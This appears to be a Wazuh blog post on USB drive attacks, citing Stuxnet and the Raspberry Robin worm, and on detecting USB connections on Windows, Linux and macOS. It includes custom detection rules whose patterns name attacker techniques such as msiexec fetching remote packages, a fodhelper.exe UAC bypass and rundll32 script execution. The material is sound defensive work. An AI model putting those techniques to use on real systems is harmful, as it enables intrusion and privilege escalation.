USB drive attacks constitute a significant cybersecurity risk, taking advantage of the everyday use of USB devices to deliver malware and circumvent traditional network security measures. These attacks lead to data breaches, financial losses, and operational disruptions, with lasting impacts on an organization’s reputation. An example is the Stuxnet worm discovered in 2010, a malware designed to target industrial control systems, specifically Iran’s nuclear enrichment facilities. It exploited multiple zero-day vulnerabilities and spread primarily through USB drives, making it one of the first examples of a cyberattack with real-world physical effects. Stuxnet exposed the risks of removable media and raised global awareness of cybersecurity threats to critical infrastructure.
How USB drive attacks propagate
Attackers use various methods to deliver malicious payloads via USB drives, targeting individuals and organizations.
- Drop attacks: Infected USB drives are deliberately left in public areas, such as parking lots, to entice victims to plug them in and infect their computers.
- Mail-based attacks: USB drives are sent to targets via mail, disguised as promotional items or legitimate devices, to trick them into plugging them into their systems.
- Social engineering: Attackers use psychological tactics to persuade victims to connect infected USB drives to their computers.
- Unsolicited plugging: Attackers plug infected USB drives into unattended systems, spreading malware without victim interaction.
How USB drive attacks work
USB drive attacks typically follow a multi-step process to infiltrate systems and cause damage.
- Reconnaissance: Attackers research their target to identify potential vulnerabilities. In this case, they may gather information about the organization, its employees, and its operational environment to determine the likelihood of someone using a USB drive.
- Weaponization: Threat actors prepare the USB drive by embedding malware. This can be achieved by directly infecting the drive or crafting a seemingly benign file, such as a document, video, or image, which contains hidden malicious code.
- Delivery: Attackers distribute the infected USB drive to targets by dropping it in public areas, giving it away as a promotional item, or using social engineering to deliver it.
- Exploitation: When the target connects to the USB drive, the malware is activated automatically or through user interaction, exploiting system vulnerabilities.
- Installation: The malware is installed on the target system, gaining persistence. This step allows the attacker to maintain control of the infected device even if it is rebooted or disconnected.
- Command and Control (C2): The malware communicates with the attacker’s server. This enables the attacker to issue commands, exfiltrate data, or deploy additional payloads.
- Actions on Objectives: The attackers achieve their goals, such as stealing sensitive data, deploying ransomware, or establishing persistent access for future exploitation.
 |
| Figure 1: Steps showing how USB Drive attacks work. |
Enhance your cybersecurity posture against USB drive attacks with Wazuh
Wazuh is an open source security platform that helps organizations detect and respond to security threats by monitoring system activities, from informational events to critical incidents. Organizations can proactively prevent breaches and safeguard sensitive data by monitoring USB activity with Wazuh.
Monitoring USB drive activities in Windows using Wazuh
Wazuh monitors USB drive activities on Windows endpoints using the Audit PNP Activity feature. This feature logs Plug and Play (PnP) events, which helps identify when USB drives are connected. It is available on Windows 10 Pro and Windows 11 Pro, Windows Server 2016, and later versions.
Organizations can configure Wazuh to detect specific system events and monitor USB-related events, particularly focusing on Windows event ID 6416, which indicates when an external device is connected. Security administrators can detect USB device connections by creating Wazuh custom rules to identify potential security incidents.
The next step includes creating a Constant Database (CDB) of permitted devices’ unique device identifiers (DeviceID). This list allows Wazuh to differentiate between authorized and unauthorized devices, generating alerts for both categories. For instance, when an authorized USB drive is plugged in, it triggers a lower-level alert, while unauthorized connections can generate high-severity alerts that indicate a potential security breach.
 |
| Figure 2: USB drive plug-in events on a monitored Windows endpoint. |
 |
| Figure 3: Authorized USB drive event. |
 |
| Figure 4: Unauthorized USB drive event. |
Threat detection use case: Detecting the Raspberry Robin USB-Drive activities
Wazuh provides a solution to mitigate USB-related threats, such as Raspberry Robin, a Windows-based worm.
Raspberry Robin targets industries like oil, gas, transportation, and tech, causing operational disruptions. It spreads via disguised .lnk files, gains persistence by updating the UserAssist registry, and mimics legitimate folders. The worm uses legitimate Windows processes such as msiexec.exe, rundll32.exe, odbcconf.exe, and fodhelper.exe to execute, persist, and download additional malicious components. Its reliance on TOR-based command and control (C2) servers for outbound communication adds stealth and complicates detection.
Wazuh detects Raspberry Robin by monitoring registry modifications, unusual command execution patterns, and suspicious system binaries use. Its real-time file integrity monitoring and threat detection rules identify malicious activity, enabling swift response to mitigate potential disruptions.
Wazuh detects and mitigates Raspberry Robin by monitoring and responding to suspicious activity like:
- Anomalous cmd.exe activities: terminating suspicious processes or isolating affected endpoints.
- Flagging msiexec.exe downloads from obscure domains, blocking connections, and alerting administrators.
- Detecting UAC bypass via fodhelper.exe, terminating the process, and notifying administrators.
- Blocking unusual outbound connections by rundll32.exe and dllhost.exe.
Below is a sample custom rule configuration that detects possible Raspberry Robin activities.
<rule id="100100" level="12">
<if_sid>92004</if_sid>
<field name="win.eventdata.image" type="pcre2">(?i)cmd.exe$</field>
<field name="win.eventdata.commandLine" type="pcre2">(?i)cmd.exe.+((/r)|(/v.+/c)|(/c)).*cmd</field>
<description>Possible Raspberry Robin execution on $(win.system.computer)</description>
<mitre>
<id>T1059.003</id>
</mitre>
</rule>
<rule id="100101" level="7">
<if_sid>61603</if_sid>
<field name="win.eventdata.image" type="pcre2">(?i)msiexec.exe$</field>
<field name="win.eventdata.commandLine" type="pcre2">(?i)msiexec.*(/q|-q|/i|-i).*(/q|-q|/i|-i).*http[s]0,1://.+[.msi]0,1</field>
<description>msiexec.exe downloading and executing packages on $(win.system.computer)</description>
<mitre>
<id>T1218.007</id>
</mitre>
</rule>
<rule id="100103" level="12">
<if_sid>61603</if_sid>
<field name="win.eventdata.originalFileName" type="pcre2">(?i)(cmd|powershell|rundll32).exe</field>
<field name="win.eventdata.parentImage" type="pcre2">(?i)fodhelper.exe</field>
<description>Use of fodhelper.exe to bypass UAC on $(win.system.computer)</description>
<mitre>
<id>T1548.002</id>
</mitre>
</rule>
<rule id="100105" level="10">
<if_sid>61603</if_sid>
<field name="win.eventdata.commandLine" type="pcre2">(regsvr32.exe|rundll32.exe|dllhost.exe).*";document.write();GetObject("script:.*).Exec()</field>
<description>Possible Raspberry Robin execution on $(win.system.computer)</description>
<mitre>
<id>T1218.011</id>
</mitre>
</rule>
 |
| Figure 5: Raspberry Robin IoCs and behaviors detected on a monitored Windows endpoint. |
 |
| Figure 6: An alert showing the Raspberry Robin IoCs detected on a monitored Windows endpoint. |
For more details on detecting the Raspberry Robin worm using Wazuh, please visit this blog.
Monitoring USB drives in Linux using Wazuh
USB drives can also introduce security risks to Linux endpoints as potential vectors for malware and unauthorized data access. udev is a system utility on Linux that automatically detects and manages external devices, such as USB drives, when plugged in. It creates the necessary device files in the /dev directory so that the system can interact with them. Administrators can create custom udev rules that generate detailed events, providing insights into USB activity. Wazuh has built-in rules for USB monitoring, but udev-generated events provide richer details, improving threat detection.
We configure udev rules on our Linux endpoints to trigger a logging script whenever a USB device is connected. The Wazuh agent must be set up to read the generated JSON log file produced from the logging script, allowing it to process and analyze USB activity.
Like the Windows USB drive monitoring, you need a constant database (CDB) list of authorized USB device serial numbers. Wazuh will compare incoming connections against this list, triggering alerts for unauthorized devices.
 |
| Figure 7: USB drive alerts for a monitored Linux endpoint. |
 |
| Figure 8: An unauthorized USB drive event on a monitored Linux endpoint. |
The blog post on Monitoring USB drives in Linux using Wazuh provides more information on monitoring USB drives plugged into Linux endpoints.
Monitoring USB drives in macOS using Wazuh
You can use a custom script to log critical events related to USB devices on macOS endpoints and then configure Wazuh to monitor these events. Administrators can extract information such as connection and disconnection events, vendor IDs, product IDs, and serial numbers of USB drives plugged in. This script interacts with macOS’s I/O Kit framework to gather USB device information, which is then formatted as JSON and saved to a log file. The log data generated from this custom script is sent to the Wazuh server for analysis using the Wazuh agent.
The blog post on Monitoring USB drives in macOS using Wazuh shows the steps to monitor USB drives on macOS endpoints.
 |
| Figure 9: USB drive alerts on a monitored macOS endpoint. |
 |
| Figure 10: Unauthorized USB drive alert on a monitored macOS endpoint. |
Conclusion
USB drive attacks pose a security risk across major operating systems, enabling malware propagation and unauthorized access to malicious actors.
Wazuh offers various detection mechanisms to increase the chances of detecting USB Drive attacks and mitigate the potential impact. Organizations can enhance cybersecurity by integrating these detection methods and enforcing strict USB access policies.
